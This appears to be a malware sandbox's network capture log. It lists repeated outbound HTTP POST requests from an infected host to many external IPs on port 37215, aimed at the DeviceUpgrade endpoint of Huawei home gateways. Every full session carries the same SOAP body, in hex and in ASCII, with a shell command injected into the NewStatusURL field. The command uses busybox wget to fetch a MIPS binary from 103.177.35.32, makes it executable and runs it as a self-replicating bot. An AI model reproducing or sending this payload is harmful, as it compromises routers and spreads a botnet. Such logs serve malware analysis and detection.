                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2906192.168.2.2333538197.82.35.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.658916950 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2907192.168.2.2348760157.12.249.11637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.658965111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2908192.168.2.2334732157.75.165.22037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.658972025 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2909192.168.2.236062641.82.57.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.659003973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2910192.168.2.2355342157.27.15.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.659394026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2911192.168.2.2352742197.232.5.1837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660077095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2912192.168.2.2355202157.103.147.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660512924 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2913192.168.2.235200641.243.115.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660557032 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2914192.168.2.2360866157.182.236.24537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660582066 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2915192.168.2.234324652.172.190.16537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.660590887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
